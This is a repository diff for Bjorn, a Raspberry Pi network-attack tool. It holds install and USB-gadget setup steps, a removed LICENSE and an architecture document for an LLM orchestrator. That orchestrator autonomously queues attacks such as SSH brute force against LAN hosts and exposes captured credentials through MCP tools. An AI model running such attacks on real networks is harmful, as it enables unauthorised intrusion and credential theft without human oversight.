- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-armhf-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
### 📌 Prerequisites for RPI zero W2 (64bits)
![image](https://github.com/user-attachments/assets/e8d276be-4cb2-474d-a74d-b5b6704d22f5)
I did not develop Bjorn for the raspberry pi zero w2 64bits, but several feedbacks have attested that the installation worked perfectly.
- Raspberry Pi OS installed.
- Stable:
- System: 64-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-arm64-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
At the moment the paper screen v2 v4 have been tested and implemented.
I juste hope the V1 & V3 will work the same.
### ⚡ Quick Install
The fastest way to install Bjorn is using the automatic installation script :
```bash
# Download and run the installer
wget https://raw.githubusercontent.com/infinition/Bjorn/refs/heads/main/install_bjorn.sh
sudo chmod +x install_bjorn.sh
sudo ./install_bjorn.sh
# Choose the choice 1 for automatic installation. It may take a while as a lot of packages and modules will be installed. You must reboot at the end.
```
### 🧰 Manual Install
#### Step 1: Activate SPI & I2C
```bash
sudo raspi-config
```
- Navigate to **"Interface Options"**.
- Enable **SPI**.
- Enable **I2C**.
#### Step 2: System Dependencies
```bash
# Update system
sudo apt-get update && sudo apt-get upgrade -y
# Install required packages
sudo apt install -y \
libjpeg-dev \
zlib1g-dev \
libpng-dev \
python3-dev \
libffi-dev \
libssl-dev \
libgpiod-dev \
libi2c-dev \
libatlas-base-dev \
build-essential \
python3-pip \
wget \
lsof \
git \
libopenjp2-7 \
nmap \
libopenblas-dev \
bluez-tools \
bluez \
dhcpcd5 \
bridge-utils \
python3-pil
# Update Nmap scripts database
sudo nmap --script-updatedb
```
#### Step 3: Bjorn Installation
```bash
# Clone the Bjorn repository
cd /home/bjorn
git clone https://github.com/infinition/Bjorn.git
cd Bjorn
# Install Python dependencies within the virtual environment
sudo pip install -r requirements.txt --break-system-packages
# As i did not succeed "for now" to get a stable installation with a virtual environment, i installed the dependencies system wide (with --break-system-packages), it did not cause any issue so far. You can try to install them in a virtual environment if you want.
```
##### 3.1: Configure E-Paper Display Type
Choose your e-Paper HAT version by modifying the configuration file:
1. Open the configuration file:
```bash
sudo vi /home/bjorn/Bjorn/config/shared_config.json
```
Press i to enter insert mode
Locate the line containing "epd_type":
Change the value according to your screen model:
- For 2.13 V1: "epd_type": "epd2in13",
- For 2.13 V2: "epd_type": "epd2in13_V2",
- For 2.13 V3: "epd_type": "epd2in13_V3",
- For 2.13 V4: "epd_type": "epd2in13_V4",
Press Esc to exit insert mode
Type :wq and press Enter to save and quit
#### Step 4: Configure File Descriptor Limits
To prevent `OSError: [Errno 24] Too many open files`, it's essential to increase the file descriptor limits.
##### 4.1: Modify File Descriptor Limits for All Users
Edit `/etc/security/limits.conf`:
```bash
sudo vi /etc/security/limits.conf
```
Add the following lines:
```
* soft nofile 65535
* hard nofile 65535
root soft nofile 65535
root hard nofile 65535
```
##### 4.2: Configure Systemd Limits
Edit `/etc/systemd/system.conf`:
```bash
sudo vi /etc/systemd/system.conf
```
Uncomment and modify:
```
DefaultLimitNOFILE=65535
```
Edit `/etc/systemd/user.conf`:
```bash
sudo vi /etc/systemd/user.conf
```
Uncomment and modify:
```
DefaultLimitNOFILE=65535
```
##### 4.3: Create or Modify `/etc/security/limits.d/90-nofile.conf`
```bash
sudo vi /etc/security/limits.d/90-nofile.conf
```
Add:
```
root soft nofile 65535
root hard nofile 65535
```
##### 4.4: Adjust the System-wide File Descriptor Limit
Edit `/etc/sysctl.conf`:
```bash
sudo vi /etc/sysctl.conf
```
Add:
```
fs.file-max = 2097152
```
Apply the changes:
```bash
sudo sysctl -p
```
#### Step 5: Reload Systemd and Apply Changes
Reload systemd to apply the new file descriptor limits:
```bash
sudo systemctl daemon-reload
```
#### Step 6: Modify PAM Configuration Files
PAM (Pluggable Authentication Modules) manages how limits are enforced for user sessions. To ensure that the new file descriptor limits are respected, update the following configuration files.
##### Step 6.1: Edit `/etc/pam.d/common-session` and `/etc/pam.d/common-session-noninteractive`
```bash
sudo vi /etc/pam.d/common-session
sudo vi /etc/pam.d/common-session-noninteractive
```
Add this line at the end of both files:
```
session required pam_limits.so
```
This ensures that the limits set in `/etc/security/limits.conf` are enforced for all user sessions.
#### Step 7: Configure Services
##### 7.1: Bjorn Service
Create the service file:
```bash
sudo vi /etc/systemd/system/bjorn.service
```
Add the following content:
```ini
[Unit]
Description=Bjorn Service
DefaultDependencies=no
Before=basic.target
After=local-fs.target
[Service]
ExecStartPre=/home/bjorn/Bjorn/kill_port_8000.sh
ExecStart=/usr/bin/python3 /home/bjorn/Bjorn/Bjorn.py
WorkingDirectory=/home/bjorn/Bjorn
StandardOutput=inherit
StandardError=inherit
Restart=always
User=root
# Check open files and restart if it reached the limit (ulimit -n buffer of 1000)
ExecStartPost=/bin/bash -c 'FILE_LIMIT=$(ulimit -n); THRESHOLD=$(( FILE_LIMIT - 1000 )); while :; do TOTAL_OPEN_FILES=$(lsof | wc -l); if [ "$TOTAL_OPEN_FILES" -ge "$THRESHOLD" ]; then echo "File descriptor threshold reached: $TOTAL_OPEN_FILES (threshold: $THRESHOLD). Restarting service."; systemctl restart bjorn.service; exit 0; fi; sleep 10; done &'
[Install]
WantedBy=multi-user.target
```
##### 7.2: Port 8000 Killer Script
Create the script to free up port 8000:
```bash
vi /home/bjorn/Bjorn/kill_port_8000.sh
```
Add:
```bash
#!/bin/bash
PORT=8000
PIDS=$(lsof -t -i:$PORT)
if [ -n "$PIDS" ]; then
echo "Killing PIDs using port $PORT: $PIDS"
kill -9 $PIDS
fi
```
Make the script executable:
```bash
chmod +x /home/bjorn/Bjorn/kill_port_8000.sh
```
##### 7.3: USB Gadget Configuration
Modify `/boot/firmware/cmdline.txt`:
```bash
sudo vi /boot/firmware/cmdline.txt
```
Add the following right after `rootwait`:
```
modules-load=dwc2,g_ether
```
Modify `/boot/firmware/config.txt`:
```bash
sudo vi /boot/firmware/config.txt
```
Add at the end of the file:
```
dtoverlay=dwc2
```
Create the USB gadget script:
```bash
sudo vi /usr/local/bin/usb-gadget.sh
```
Add the following content:
```bash
#!/bin/bash
set -e
modprobe libcomposite
cd /sys/kernel/config/usb_gadget/
mkdir -p g1
cd g1
echo 0x1d6b > idVendor
echo 0x0104 > idProduct
echo 0x0100 > bcdDevice
echo 0x0200 > bcdUSB
mkdir -p strings/0x409
echo "fedcba9876543210" > strings/0x409/serialnumber
echo "Raspberry Pi" > strings/0x409/manufacturer
echo "Pi Zero USB" > strings/0x409/product
mkdir -p configs/c.1/strings/0x409
echo "Config 1: ECM network" > configs/c.1/strings/0x409/configuration
echo 250 > configs/c.1/MaxPower
mkdir -p functions/ecm.usb0
# Check for existing symlink and remove if necessary
if [ -L configs/c.1/ecm.usb0 ]; then
rm configs/c.1/ecm.usb0
fi
ln -s functions/ecm.usb0 configs/c.1/
# Ensure the device is not busy before listing available USB device controllers
max_retries=10
retry_count=0
while ! ls /sys/class/udc > UDC 2>/dev/null; do
if [ $retry_count -ge $max_retries ]; then
echo "Error: Device or resource busy after $max_retries attempts."
exit 1
fi
retry_count=$((retry_count + 1))
sleep 1
done
# Check if the usb0 interface is already configured
if ! ip addr show usb0 | grep -q "172.20.2.1"; then
ifconfig usb0 172.20.2.1 netmask 255.255.255.0
else
echo "Interface usb0 already configured."
fi
```
Make the script executable:
```bash
sudo chmod +x /usr/local/bin/usb-gadget.sh
```
Create the systemd service:
```bash
sudo vi /etc/systemd/system/usb-gadget.service
```
Add:
```ini
[Unit]
Description=USB Gadget Service
After=network.target
[Service]
ExecStartPre=/sbin/modprobe libcomposite
ExecStart=/usr/local/bin/usb-gadget.sh
Type=simple
RemainAfterExit=yes
[Install]
WantedBy=multi-user.target
```
Configure `usb0`:
```bash
sudo vi /etc/network/interfaces
```
Add:
```bash
allow-hotplug usb0
iface usb0 inet static
address 172.20.2.1
netmask 255.255.255.0
```
Reload the services:
```bash
sudo systemctl daemon-reload
sudo systemctl enable systemd-networkd
sudo systemctl enable usb-gadget
sudo systemctl start systemd-networkd
sudo systemctl start usb-gadget
```
You must reboot to be able to use it as a USB gadget (with ip)
###### Windows PC Configuration
Set the static IP address on your Windows PC:
- **IP Address**: `172.20.2.2`
- **Subnet Mask**: `255.255.255.0`
- **Default Gateway**: `172.20.2.1`
- **DNS Servers**: `8.8.8.8`, `8.8.4.4`
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

21
LICENSE
View File

@@ -1,21 +0,0 @@
MIT License
Copyright (c) 2024 infinition
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

916
LLM_MCP_ARCHITECTURE.md Normal file
View File

@@ -0,0 +1,916 @@
# BJORN — LLM Bridge, MCP Server & LLM Orchestrator
## Complete architecture, operation, commands, fallbacks
---
## Table of contents
1. [Overview](#1-overview)
2. [Created / modified files](#2-created--modified-files)
3. [LLM Bridge (`llm_bridge.py`)](#3-llm-bridge-llm_bridgepy)
4. [MCP Server (`mcp_server.py`)](#4-mcp-server-mcp_serverpy)
5. [LLM Orchestrator (`llm_orchestrator.py`)](#5-llm-orchestrator-llm_orchestratorpy)
6. [Orchestrator & Scheduler integration](#6-orchestrator--scheduler-integration)
7. [Web Utils LLM (`web_utils/llm_utils.py`)](#7-web-utils-llm-web_utilsllm_utilspy)
8. [EPD comment integration (`comment.py`)](#8-epd-comment-integration-commentpy)
9. [Configuration (`shared.py`)](#9-configuration-sharedpy)
10. [HTTP Routes (`webapp.py`)](#10-http-routes-webapppy)
11. [Web interfaces](#11-web-interfaces)
12. [Startup (`Bjorn.py`)](#12-startup-bjornpy)
13. [LaRuche / LAND Protocol compatibility](#13-laruche--land-protocol-compatibility)
14. [Optional dependencies](#14-optional-dependencies)
15. [Quick activation & configuration](#15-quick-activation--configuration)
16. [Complete API endpoint reference](#16-complete-api-endpoint-reference)
17. [Queue priority system](#17-queue-priority-system)
18. [Fallbacks & graceful degradation](#18-fallbacks--graceful-degradation)
19. [Call sequences](#19-call-sequences)
---
## 1. Overview
```
┌─────────────────────────────────────────────────────────────────────┐
│ BJORN (RPi) │
│ │
│ ┌─────────────┐ ┌──────────────────┐ ┌─────────────────────┐ │
│ │ Core BJORN │ │ MCP Server │ │ Web UI │ │
│ │ (unchanged) │ │ (mcp_server.py) │ │ /chat.html │ │
│ │ │ │ 7 exposed tools │ │ /mcp-config.html │ │
│ │ comment.py │ │ HTTP SSE / stdio │ │ ↳ Orch Log button │ │
│ │ ↕ LLM hook │ │ │ │ │ │
│ └──────┬──────┘ └────────┬─────────┘ └──────────┬──────────┘ │
│ └─────────────────────────────────────────────┘ │
│ │ │
│ ┌──────────────────────────▼─────────────────────────────────┐ │
│ │ LLM Bridge (llm_bridge.py) │ │
│ │ Singleton · Thread-safe │ │
│ │ │ │
│ │ Automatic cascade: │ │
│ │ 1. LaRuche node (LAND/mDNS → HTTP POST /infer) │ │
│ │ 2. Local Ollama (HTTP POST /api/chat) │ │
│ │ 3. External API (Anthropic / OpenAI / OpenRouter) │ │
│ │ 4. None (→ fallback templates in comment.py) │ │
│ │ │ │
│ │ Agentic tool-calling loop (stop_reason=tool_use, ≤6 turns) │ │
│ │ _BJORN_TOOLS: 7 tools in Anthropic format │ │
│ └─────────────────────────────────────────────────────────────┘ │
│ │ │
│ ┌──────────────────────────▼─────────────────────────────────┐ │
│ │ LLM Orchestrator (llm_orchestrator.py) │ │
│ │ │ │
│ │ mode = none → LLM has no role in scheduling │ │
│ │ mode = advisor → LLM suggests 1 action/cycle (prio 85) │ │
│ │ mode = autonomous→ own thread, loop + tools (prio 82) │ │
│ │ │ │
│ │ Fingerprint (hosts↑, vulns↑, creds↑, queue_id↑) │ │
│ │ → skip LLM if nothing new (token savings) │ │
│ └─────────────────────────────────────────────────────────────┘ │
│ │ │
│ ┌──────────────────────────▼─────────────────────────────────┐ │
│ │ Action Queue (SQLite) │ │
│ │ scheduler=40 normal=50 MCP=80 autonomous=82 advisor=85│ │
│ └─────────────────────────────────────────────────────────────┘ │
└─────────────────────────────────────────────────────────────────────┘
↕ mDNS _ai-inference._tcp.local. (zeroconf)
┌──────────────────────────────────────────┐
│ LaRuche Swarm (LAN) │
│ Node A → Mistral 7B :8419 │
│ Node B → DeepSeek Coder :8419 │
│ Node C → Phi-3 Mini :8419 │
└──────────────────────────────────────────┘
```
**Design principles:**
- Everything is **disabled by default** — zero impact if not configured
- All dependencies are **optional** — silent import if missing
- **Systematic fallback** at every level — Bjorn never crashes because of the LLM
- The bridge is a **singleton** — one instance per process, thread-safe
- EPD comments preserve their **exact original behaviour** if LLM is disabled
- The LLM is the **brain** (decides what to do), the orchestrator is the **arms** (executes)
---
## 2. Created / modified files
### Created files
| File | Approx. size | Role |
|------|-------------|------|
| `llm_bridge.py` | ~450 lines | LLM Singleton — backend cascade + agentic tool-calling loop |
| `mcp_server.py` | ~280 lines | FastMCP MCP Server — 7 Bjorn tools |
| `web_utils/llm_utils.py` | ~220 lines | LLM/MCP HTTP endpoints (web_utils pattern) |
| `llm_orchestrator.py` | ~410 lines | LLM Orchestrator — advisor & autonomous modes |
| `web/chat.html` | ~300 lines | Chat interface + Orch Log button |
| `web/mcp-config.html` | ~400 lines | LLM & MCP configuration page |
### Modified files
| File | What changed |
|------|-------------|
| `shared.py` | +45 config keys (LLM bridge, MCP, orchestrator) |
| `comment.py` | LLM hook in `get_comment()` — 12 lines added |
| `utils.py` | +1 entry in lazy WebUtils registry: `"llm_utils"` |
| `webapp.py` | +9 GET/POST routes in `_register_routes_once()` |
| `Bjorn.py` | LLM Bridge warm-up + conditional MCP server start |
| `orchestrator.py` | +`LLMOrchestrator` lifecycle + advisor call in background tasks |
| `action_scheduler.py` | +skip scheduler if LLM autonomous only (`llm_orchestrator_skip_scheduler`) |
| `requirements.txt` | +3 comment lines (optional dependencies documented) |
---
## 3. LLM Bridge (`llm_bridge.py`)
### Internal architecture
```
LLMBridge (Singleton)
├── __init__() Initialises singleton, launches LaRuche discovery
├── complete() Main API — cascades all backends
│ └── tools=None/[...] Optional param to enable tool-calling
├── generate_comment() Generates a short EPD comment (≤80 tokens)
├── chat() Stateful chat with per-session history
│ └── tools=_BJORN_TOOLS if llm_chat_tools_enabled=True
├── clear_history() Clears a session's history
├── status() Returns bridge state (for the UI)
├── _start_laruche_discovery() Starts mDNS thread in background
├── _discover_laruche_mdns() Listens to _ai-inference._tcp.local. continuously
├── _call_laruche() Backend 1 — POST http://[node]:8419/infer
├── _call_ollama() Backend 2 — POST http://localhost:11434/api/chat
├── _call_anthropic() Backend 3a — POST api.anthropic.com + AGENTIC LOOP
│ └── loop ≤6 turns: send → tool_use → execute → feed result → repeat
├── _call_openai_compat() Backend 3b — POST [base_url]/v1/chat/completions
├── _execute_tool(name, inputs) Dispatches to mcp_server._impl_*
│ └── gate: checks mcp_allowed_tools before executing
└── _build_system_prompt() Builds system prompt with live Bjorn context
_BJORN_TOOLS : List[Dict] Anthropic-format definitions for the 7 MCP tools
```
### _BJORN_TOOLS — full list
```python
_BJORN_TOOLS = [
{"name": "get_hosts", "description": "...", "input_schema": {...}},
{"name": "get_vulnerabilities", ...},
{"name": "get_credentials", ...},
{"name": "get_action_history", ...},
{"name": "get_status", ...},
{"name": "run_action", ...}, # gated by mcp_allowed_tools
{"name": "query_db", ...}, # SELECT only
]
```
### Backend cascade
```
llm_backend = "auto" → LaRuche → Ollama → API → None
llm_backend = "laruche" → LaRuche only
llm_backend = "ollama" → Ollama only
llm_backend = "api" → External API only
```
At each step, if a backend fails (timeout, network error, missing model), the next one is tried **silently**. If all fail, `complete()` returns `None`.
### Agentic tool-calling loop (`_call_anthropic`)
When `tools` is passed to `complete()`, the Anthropic backend enters agentic mode:
```
_call_anthropic(messages, system, tools, max_tokens, timeout)
├─ POST /v1/messages {tools: [...]}
├─ [stop_reason = "tool_use"]
│ for each tool_use block:
│ result = _execute_tool(name, inputs)
│ append {role: "tool", tool_use_id: ..., content: result}
│ POST /v1/messages [messages + tool results] ← next turn
└─ [stop_reason = "end_turn"] → returns final text
[≥6 turns] → returns partial text + warning
```
`_execute_tool()` dispatches directly to `mcp_server._impl_*` (no network), checking `mcp_allowed_tools` for `run_action`.
### Tool-calling in chat (`chat()`)
If `llm_chat_tools_enabled = True`, the chat passes `tools=_BJORN_TOOLS` to the backend, letting the LLM answer with real-time data (hosts, vulns, creds…) rather than relying only on its training knowledge.
### Chat history
- Each session has its own history (key = `session_id`)
- Special session `"llm_orchestrator"`: contains the autonomous orchestrator's reasoning
- Max size configurable: `llm_chat_history_size` (default: 20 messages)
- History is **in-memory only** — not persisted across restarts
- Thread-safe via `_hist_lock`
---
## 4. MCP Server (`mcp_server.py`)
### What is MCP?
The **Model Context Protocol** (Anthropic) is an open-source protocol that lets AI agents (Claude Desktop, custom agents, etc.) use external tools via a standardised interface.
By enabling Bjorn's MCP server, **any MCP client can query and control Bjorn** — without knowing the internal DB structure.
### Exposed tools
| Tool | Arguments | Description |
|------|-----------|-------------|
| `get_hosts` | `alive_only: bool = True` | Returns discovered hosts (IP, MAC, hostname, OS, ports) |
| `get_vulnerabilities` | `host_ip: str = ""`, `limit: int = 100` | Returns discovered CVE vulnerabilities |
| `get_credentials` | `service: str = ""`, `limit: int = 100` | Returns captured credentials (SSH, FTP, SMB…) |
| `get_action_history` | `limit: int = 50`, `action_name: str = ""` | History of executed actions |
| `get_status` | *(none)* | Real-time state: mode, active action, counters |
| `run_action` | `action_name: str`, `target_ip: str`, `target_mac: str = ""` | Queues a Bjorn action (MCP priority = 80) |
| `query_db` | `sql: str`, `params: str = "[]"` | Free SELECT against the SQLite DB (read-only) |
**Security:** each tool checks `mcp_allowed_tools` — unlisted tools return a clean error. `query_db` rejects anything that is not a `SELECT`.
### `_impl_run_action` — priority detail
```python
_MCP_PRIORITY = 80 # > scheduler(40) > normal(50)
sd.db.queue_action(
action_name=action_name,
mac=mac, # resolved from hosts WHERE ip=? if not supplied
ip=target_ip,
priority=_MCP_PRIORITY,
trigger="mcp",
metadata={"decision_method": "mcp", "decision_origin": "mcp"},
)
sd.queue_event.set() # wakes the orchestrator immediately
```
### Available transports
| Transport | Config | Usage |
|-----------|--------|-------|
| `http` (default) | `mcp_transport: "http"`, `mcp_port: 8765` | Accessible from any MCP client on LAN via SSE |
| `stdio` | `mcp_transport: "stdio"` | Claude Desktop, CLI agents |
---
## 5. LLM Orchestrator (`llm_orchestrator.py`)
The LLM Orchestrator transforms Bjorn from a scriptable tool into an autonomous agent. It is **completely optional and disableable** via `llm_orchestrator_mode = "none"`.
### Operating modes
| Mode | Config value | Operation |
|------|-------------|-----------|
| Disabled | `"none"` (default) | LLM plays no role in planning |
| Advisor | `"advisor"` | LLM consulted periodically, suggests 1 action |
| Autonomous | `"autonomous"` | Own thread, LLM observes + plans with tools |
### Internal architecture
```
LLMOrchestrator
├── start() Starts autonomous thread if mode=autonomous
├── stop() Stops thread (join 15s max)
├── restart_if_mode_changed() Called from orchestrator.run() each iteration
├── is_active() True if autonomous thread is alive
├── [ADVISOR MODE]
│ advise() → called from orchestrator._process_background_tasks()
│ ├── _build_snapshot() → compact dict (hosts, vulns, creds, queue)
│ ├── LLMBridge().complete(prompt, system)
│ └── _apply_advisor_response(raw, allowed)
│ ├── parse JSON {"action": str, "target_ip": str, "reason": str}
│ ├── validate action ∈ allowed
│ └── db.queue_action(priority=85, trigger="llm_advisor")
└── [AUTONOMOUS MODE]
_autonomous_loop() Thread "LLMOrchestrator" (daemon)
└── loop:
_compute_fingerprint() → (hosts, vulns, creds, max_queue_id)
_has_actionable_change() → skip if nothing increased
_run_autonomous_cycle()
├── filter tools: read-only always + run_action if in allowed
├── LLMBridge().complete(prompt, system, tools=[...])
│ └── _call_anthropic() agentic loop
│ → LLM calls run_action via tools
│ → _execute_tool → _impl_run_action → queue
└── if llm_orchestrator_log_reasoning=True:
logger.info("[LLM_ORCH_REASONING]...")
_push_to_chat() → "llm_orchestrator" session in LLMBridge
sleep(llm_orchestrator_interval_s)
```
### Fingerprint and smart skip
```python
def _compute_fingerprint(self) -> tuple:
# (host_count, vuln_count, cred_count, max_completed_queue_id)
return (hosts, vulns, creds, last_id)
def _has_actionable_change(self, fp: tuple) -> bool:
if self._last_fingerprint is None:
return True # first cycle always runs
# Triggers ONLY if something INCREASED
# hosts going offline → not actionable
return any(fp[i] > self._last_fingerprint[i] for i in range(len(fp)))
```
**Token savings:** if `llm_orchestrator_skip_if_no_change = True` (default), the LLM cycle is skipped if no new hosts/vulns/creds and no action completed since the last cycle.
### LLM priorities vs queue
```python
_ADVISOR_PRIORITY = 85 # advisor > MCP(80) > normal(50) > scheduler(40)
_AUTONOMOUS_PRIORITY = 82 # autonomous slightly below advisor
```
### Autonomous system prompt — example
```
"You are Bjorn's autonomous orchestrator, running on a Raspberry Pi network security tool.
Current state: 12 hosts discovered, 3 vulnerabilities, 1 credentials.
Operation mode: ATTACK. Hard limit: at most 3 run_action calls per cycle.
Only these action names may be queued: NmapScan, SSHBruteforce, SMBScan.
Strategy: prioritise unexplored services, hosts with high port counts, and hosts with no recent scans.
Do not queue duplicate actions already pending or recently successful.
Use Norse references occasionally. Be terse and tactical."
```
### Advisor response format
```json
// Action recommended:
{"action": "NmapScan", "target_ip": "192.168.1.42", "reason": "unexplored host, 0 open ports known"}
// Nothing to do:
{"action": null}
```
### Reasoning log
When `llm_orchestrator_log_reasoning = True`:
- Full reasoning is logged via `logger.info("[LLM_ORCH_REASONING]...")`
- It is also injected into the `"llm_orchestrator"` session in `LLMBridge._chat_histories`
- Viewable in real time in `chat.html` via the **Orch Log** button
---
## 6. Orchestrator & Scheduler integration
### `orchestrator.py`
```python
# __init__
self.llm_orchestrator = None
self._init_llm_orchestrator()
# _init_llm_orchestrator()
if shared_data.config.get("llm_enabled") and shared_data.config.get("llm_orchestrator_mode") != "none":
from llm_orchestrator import LLMOrchestrator
self.llm_orchestrator = LLMOrchestrator(shared_data)
self.llm_orchestrator.start()
# run() — each iteration
self._sync_llm_orchestrator() # starts/stops thread according to runtime config
# _process_background_tasks()
if self.llm_orchestrator and mode == "advisor":
self.llm_orchestrator.advise()
```
### `action_scheduler.py` — skip option
```python
# In run(), each iteration:
_llm_skip = bool(
shared_data.config.get("llm_orchestrator_skip_scheduler", False)
and shared_data.config.get("llm_orchestrator_mode") == "autonomous"
and shared_data.config.get("llm_enabled", False)
)
if not _llm_skip:
self._publish_all_upcoming() # step 2: publish due actions
self._evaluate_global_actions() # step 3: global evaluation
self.evaluate_all_triggers() # step 4: per-host triggers
# Steps 1 (promote due) and 5 (cleanup/priorities) always run
```
When `llm_orchestrator_skip_scheduler = True` + `mode = autonomous` + `llm_enabled = True`:
- The scheduler no longer publishes automatic actions (no more `B_require`, `B_trigger`, etc.)
- The autonomous LLM becomes **sole master of the queue**
- Queue hygiene (promotions, cleanup) remains active
---
## 7. Web Utils LLM (`web_utils/llm_utils.py`)
Follows the exact **same pattern** as all other `web_utils` (constructor `__init__(self, shared_data)`, methods called by `webapp.py`).
### Methods
| Method | Type | Description |
|--------|------|-------------|
| `get_llm_status(handler)` | GET | LLM bridge state (active backend, LaRuche URL…) |
| `get_llm_config(handler)` | GET | Current LLM config (api_key masked) |
| `get_llm_reasoning(handler)` | GET | `llm_orchestrator` session history (reasoning log) |
| `handle_chat(data)` | POST | Sends a message, returns LLM response |
| `clear_chat_history(data)` | POST | Clears a session's history |
| `get_mcp_status(handler)` | GET | MCP server state (running, port, transport) |
| `toggle_mcp(data)` | POST | Enables/disables MCP server + saves config |
| `save_mcp_config(data)` | POST | Saves MCP config (tools, port, transport) |
| `save_llm_config(data)` | POST | Saves LLM config (all parameters) |
---
## 8. EPD comment integration (`comment.py`)
### Behaviour before modification
```
get_comment(status, lang, params)
└── if delay elapsed OR status changed
└── _pick_text(status, lang, params) ← SQLite DB
└── returns weighted text
```
### Behaviour after modification
```
get_comment(status, lang, params)
└── if delay elapsed OR status changed
├── [if llm_comments_enabled = True]
│ └── LLMBridge().generate_comment(status, params)
│ ├── success → LLM text (≤12 words, ~8s max)
│ └── failure/timeout → text = None
└── [if text = None] ← SYSTEMATIC FALLBACK
└── _pick_text(status, lang, params) ← original behaviour
└── returns weighted DB text
```
**Original behaviour preserved 100% if LLM disabled or failing.**
---
## 9. Configuration (`shared.py`)
### LLM Bridge section (`__title_llm__`)
| Key | Default | Type | Description |
|-----|---------|------|-------------|
| `llm_enabled` | `False` | bool | **Master toggle** — activates the entire bridge |
| `llm_comments_enabled` | `False` | bool | Use LLM for EPD comments |
| `llm_chat_enabled` | `True` | bool | Enable /chat.html interface |
| `llm_chat_tools_enabled` | `False` | bool | Enable tool-calling in web chat |
| `llm_backend` | `"auto"` | str | `auto` \| `laruche` \| `ollama` \| `api` |
| `llm_laruche_discovery` | `True` | bool | Auto-discover LaRuche nodes via mDNS |
| `llm_laruche_url` | `""` | str | Manual LaRuche URL (overrides discovery) |
| `llm_ollama_url` | `"http://127.0.0.1:11434"` | str | Local Ollama URL |
| `llm_ollama_model` | `"phi3:mini"` | str | Ollama model to use |
| `llm_api_provider` | `"anthropic"` | str | `anthropic` \| `openai` \| `openrouter` |
| `llm_api_key` | `""` | str | API key (masked in UI) |
| `llm_api_model` | `"claude-haiku-4-5-20251001"` | str | External API model |
| `llm_api_base_url` | `""` | str | Custom base URL (OpenRouter, proxy…) |
| `llm_timeout_s` | `30` | int | Global LLM call timeout (seconds) |
| `llm_max_tokens` | `500` | int | Max tokens for chat |
| `llm_comment_max_tokens` | `80` | int | Max tokens for EPD comments |
| `llm_chat_history_size` | `20` | int | Max messages per chat session |
### MCP Server section (`__title_mcp__`)
| Key | Default | Type | Description |
|-----|---------|------|-------------|
| `mcp_enabled` | `False` | bool | Enable MCP server |
| `mcp_transport` | `"http"` | str | `http` (SSE) \| `stdio` |
| `mcp_port` | `8765` | int | HTTP SSE port |
| `mcp_allowed_tools` | `[all]` | list | List of authorised MCP tools |
### LLM Orchestrator section (`__title_llm_orch__`)
| Key | Default | Type | Description |
|-----|---------|------|-------------|
| `llm_orchestrator_mode` | `"none"` | str | `none` \| `advisor` \| `autonomous` |
| `llm_orchestrator_interval_s` | `60` | int | Delay between autonomous cycles (min 30s) |
| `llm_orchestrator_max_actions` | `3` | int | Max actions per autonomous cycle |
| `llm_orchestrator_allowed_actions` | `[]` | list | Actions the LLM may queue (empty = mcp_allowed_tools) |
| `llm_orchestrator_skip_scheduler` | `False` | bool | Disable scheduler when autonomous is active |
| `llm_orchestrator_skip_if_no_change` | `True` | bool | Skip cycle if fingerprint unchanged |
| `llm_orchestrator_log_reasoning` | `False` | bool | Log full LLM reasoning |
---
## 10. HTTP Routes (`webapp.py`)
### GET routes
| Route | Handler | Description |
|-------|---------|-------------|
| `GET /api/llm/status` | `llm_utils.get_llm_status` | LLM bridge state |
| `GET /api/llm/config` | `llm_utils.get_llm_config` | LLM config (api_key masked) |
| `GET /api/llm/reasoning` | `llm_utils.get_llm_reasoning` | Orchestrator reasoning log |
| `GET /api/mcp/status` | `llm_utils.get_mcp_status` | MCP server state |
### POST routes (JSON data-only)
| Route | Handler | Description |
|-------|---------|-------------|
| `POST /api/llm/chat` | `llm_utils.handle_chat` | Send a message to the LLM |
| `POST /api/llm/clear_history` | `llm_utils.clear_chat_history` | Clear a session's history |
| `POST /api/llm/config` | `llm_utils.save_llm_config` | Save LLM config |
| `POST /api/mcp/toggle` | `llm_utils.toggle_mcp` | Enable/disable MCP |
| `POST /api/mcp/config` | `llm_utils.save_mcp_config` | Save MCP config |
All routes respect Bjorn's existing authentication (`webauth`).
---
## 11. Web interfaces
### `/chat.html`
Terminal-style chat interface (black/red, consistent with Bjorn).
**Features:**
- Auto-detects LLM state on load (`GET /api/llm/status`)
- Displays active backend (LaRuche URL, or mode)
- "Bjorn is thinking..." indicator during response
- Unique session ID per browser tab
- `Enter` = send, `Shift+Enter` = new line
- Textarea auto-resize
- **"Clear history"** button — clears server-side session
- **"Orch Log"** button — loads the autonomous orchestrator's reasoning
- Calls `GET /api/llm/reasoning`
- Renders each message (cycle prompt + LLM response) as chat bubbles
- "← Back to chat" to return to normal chat
- Helper message if log is empty (hint: enable `llm_orchestrator_log_reasoning`)
**Access:** `http://[bjorn-ip]:8000/chat.html`
### `/mcp-config.html`
Full LLM & MCP configuration page.
**LLM Bridge section:**
- Master enable/disable toggle
- EPD comments, chat, chat tool-calling toggles
- Backend selector (auto / laruche / ollama / api)
- LaRuche mDNS discovery toggle + manual URL
- Ollama configuration (URL + model)
- External API configuration (provider, key, model, custom URL)
- Timeout and token parameters
- "TEST CONNECTION" button
**MCP Server section:**
- Enable toggle with live start/stop
- Transport selector (HTTP SSE / stdio)
